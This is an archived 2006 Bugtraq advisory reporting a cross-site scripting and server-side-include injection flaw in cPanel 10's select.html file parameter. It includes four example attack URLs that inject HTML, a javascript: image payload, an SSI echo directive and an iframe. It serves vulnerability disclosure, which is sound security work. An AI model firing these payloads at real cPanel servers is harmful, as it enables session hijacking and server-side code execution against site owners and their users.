XSS in Cpanel 10

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: XSS in Cpanel 10
From: preth00nker@xxxxxxxxx
Date: 26 Jun 2006 03:36:08 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

A new vulnerability was found in Cpanel V.10;       
It happen cause the variable *&File* of the *select.html* file (in the 
edit-zone) just filter the <script>'s labels and the possibility can by open to 
other labels like       
      
*Server Side Include,       
*HMTL labels...      
*including Javascript expressed in other ways      
      
An attacker can use this vuln. for execute remote scripts in the browser of 
clients and take advantage of this for hijacking a session or execute SSI code 
in the own server    
  
Exploit & Examples:

         [+] Exploit:
http://[Target]:[Port]/[Dir]/x/files/select.html?dir=/&file= <h1><b>Your code 
here!!</b></h1>

         [+] Javascript:
http://[Target]:2082/frontend/x/files/select.html?dir=/&file=<IMG 
src="javascript:alert('yeah');">

         [+] Server Side Inclusion
http://[Target]:2082/frontend/x/files/select.html?dir=/&file=<!--#echo 
var="HTTP_REFERER" -->

         [+] HTML
http://[Target]:2082/frontend/x/files/select.html?dir=/&file=<IFRAME 
SRC="index.html">

________________________________________________  
discovery by the staff of http://MexHackTeam.org
                   By Preth00nker 
          Preth00nker [at] gmail [dot] com

Prev by Date: [USN-304-1] gnupg vulnerability
Next by Date: [ GLSA 200606-25 ] Hashcash: Possible heap overflow
Previous by thread: [USN-304-1] gnupg vulnerability
Next by thread: Re: XSS in Cpanel 10
Index(es):
- Date
- Thread